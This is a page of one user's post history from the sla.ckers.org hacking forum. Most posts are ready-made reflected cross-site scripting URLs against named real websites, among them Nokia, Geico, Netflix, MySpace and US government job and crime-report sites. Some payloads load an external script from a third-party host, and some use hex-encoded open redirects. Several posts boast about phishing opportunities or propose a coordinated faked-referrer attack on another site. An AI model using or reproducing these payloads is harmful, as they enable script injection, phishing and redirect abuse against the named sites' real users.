Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 40
7 years ago
Lockdown
that europe nokia one could be improved on. It's nasty just for downloading trojans and stuff, which would be very bad, but also, to make it just more instajavascripty http://europe.nokia.com/A4164022?url=javascript:alert(%22XSS%22); or, just onload http://europe.nokia.com/A4164022?url='%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cspan Whateva floats yo boat ;-)
Forum: Full Disclosure
7 years ago
Lockdown
kirke Wrote: ------------------------------------------------------- > http://www.justiz.gv.at/service/content.php?v_sear > ch=xss%22%3E%3Cscript%20src=http://files.die-welt. > net/s.js%3E%3C/script%3E > > original POST converted to GET, and another > example for some stupid php "sanitations" (useless > as we all know:) Eh, it's just stupid coders using
Forum: Full Disclosure
7 years ago
Lockdown
ROFL @ Above We know we're insecure, but we can't have hackers not adhering to w3c standards!
Forum: Full Disclosure
7 years ago
Lockdown
This exploit affects the billing systems of countless web hosting companies. WHMCS (Hosting CMS) Flaw found by Lockdown http://demo.whmcs.com/dologin.php?goto=%68%74%74%70%3A%2F%2F%77%77%77%2E%72%61%77%72%63%6F%72%65%2E%6E%65%74%2F%69%6E%64%65%78 hai mom ----
Forum: Full Disclosure
7 years ago
Lockdown
http://www.billoreilly.com/search/searchresultsframe.jsp?searchstring=%22%3E%3CScript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&x=0&y=0&sortby=0&sortdir=1&searchcategory=0
Forum: Full Disclosure
7 years ago
Lockdown
<3 Geico commercials. Cigarrettes http://www.smokerswelcome.com/CAM/dtclogin.jsp?brand=lolhai%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E http://www.philipmorrisusa.com/en/search/search.asp?criteria=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&code=noResultsFound
Forum: Full Disclosure
7 years ago
Lockdown
You fat: http://www.rawrcore.net/?page_id=3 .GOV EXPLOITS! H0mGAZ!11 http://www.rawrcore.net/?p=9 and I guess I'll throw this one out there because I published like a year ago and no one seemed to care: https://secure.geico.com/hr/jobapp.do?PERSONAL_DATA_firstName=lawl%22%3E%3Cbody%20onload=%22alert('lol');document.write('An%20XSS%20so%20easy,%20even%20a%20caveman%20can%20do%20it.
Forum: Full Disclosure
7 years ago
Lockdown
Damn, I feel so young.
Forum: OMG Ponies
7 years ago
Lockdown
@ Previous post: Basically, they can be used as links that seem legitmate to someone clicking them (encode the URL in hex), and when they click it they are redirected. Because the link they originally clicked looked valid, there's no reason for them to double check, and thus a page that looks like a legitmate login page or something on that site would be seem authentic, but could actually be us
Forum: Full Disclosure
7 years ago
Lockdown
How old are you? << 15.
Forum: OMG Ponies
7 years ago
Lockdown
Yeah, I'm a bit late too. Damn man, we could totally start our own XSS Security Company. We could totally destroy the reputation of all other companies too (do to their suckage) A whole lot more "HackerSafe" XSS Vulns: http://www.acehardware.com/search/noResults.jsp?kw=rofl%3Cscript%3Ealert('xss');%3C/script%3E https://www.hrsaccount.com/hrs/ecare;jsessionid=?cmd_DisplayContactUsN
Forum: Full Disclosure
7 years ago
Lockdown
http://www.airtightnetworks.net/site_search.asp?mode=allwords&search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&submit0=Go
Forum: Full Disclosure
7 years ago
Lockdown
@tx: http://www10.edacafe.com/IP/result_vcx.php?keywords=lol'%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
Forum: Full Disclosure
7 years ago
Lockdown
http://www.vh1.com/search/search.jhtml?searchterm=%22;%20alert(%22XSS%22);%20%3C/script%3E
Forum: Full Disclosure
7 years ago
Lockdown
http://www.australia.gov.au/click.php?http://www.rawrcore.net
Forum: Full Disclosure
7 years ago
Lockdown
Damn, I auto-loaded way down to the bottom at the beginning, and I thought someone found an xss exploit in these forums. Damn.
Forum: Full Disclosure
7 years ago
Lockdown
http://www.gay.com/search/splash.html?keywords=%3Cscript%3Ealert%28%22You+gay+ya%3F%22%29%3B%3C%2Fscript%3E&submitSearch=search&type=content&sort=date
Forum: Full Disclosure
7 years ago
Lockdown
http://jobs.netflix.com/applyFlix.asp?act=dologin&cocode=flix&email=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E Netflix =0
Forum: Full Disclosure
7 years ago
Lockdown
Maddox = | http://maddox.xmission.com/outgoing.cgi?u=http%3A%2F%2Fmaddox%2Exmission%2Enet%2F | Also, I think that if we work together on this board, and make a link that sends fake referrer headers, we can make an exploit on http://maddox.xmission.com/statistics/statistics.html << this page. We need at least 100 hits on a page that fakes the referrer headers as saying "><script
Forum: Full Disclosure
7 years ago
Lockdown
Newlines // other formatting characters don't work =|
Forum: XSS Info
7 years ago
Lockdown
Irony, thy name is XSS http://www.ic3.gov/search.aspx?q=%3Cscript%3Ealert(%22Oh%20the%20cruel%20irony%22);%3C/script%3E www.rawrcore.net plz <3
Forum: Full Disclosure
7 years ago
Lockdown
malorn Wrote: ------------------------------------------------------- > http://www.statcounter.com/help/knowledge_base/sea > rch_knowledge_base.php?seachtext=">alert('xss') http://www.statcounter.com/help/knowledge_base/search_knowledge_base.php?seachtext=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E As for the fact that Easy discovered that, I see his 1 exploit and I raise h
Forum: Full Disclosure
7 years ago
Lockdown
https://fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert('xss');%3C/script%3E Seriously. No filtering. Whatsoever. At all.
Forum: Full Disclosure
7 years ago
Lockdown
It's not _GET, it's POST.
Forum: XSS Info
7 years ago
Lockdown
Thanks to Malorn for the starting place http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl+%27&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&special=&sb=&startIndex=0 We win. Again. http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl&location=%22+onmouseover%3D%22alert%28%27Lockdown%20LOL%27%29%3Bvar+scElem+%
Forum: Full Disclosure
7 years ago
Lockdown
Got one: http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl+%27&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&special=&sb=&startIndex=0 Myspace Exploit ^7 by Lockdown
Forum: Full Disclosure
7 years ago
Lockdown
This filter changes whitespace into a + and I can't use <script>... how can I deal with this?
Forum: XSS Info
7 years ago
Lockdown
The src ?</script> kinda screws stuff up doesn't it? Or maybe the exploit got patched already
Forum: Full Disclosure
7 years ago
Lockdown
Again? Dude, myspace needs you on their payroll. But then again, so does every other site. Hell... the internet needs you on its payroll.
Forum: Full Disclosure
7 years ago
Lockdown
Eh Oh El http://prints.deviantart.com/?catpath=photography&order=9&q=%22%3E%3Cscript+src%3D//ha.ckers.org/s.js?%3E%3C%2Fscript%3E+ In the store too.. hella phishing oppurtunities and shnap.
Forum: Full Disclosure
Pages: 12Next
Current Page: 1 of 2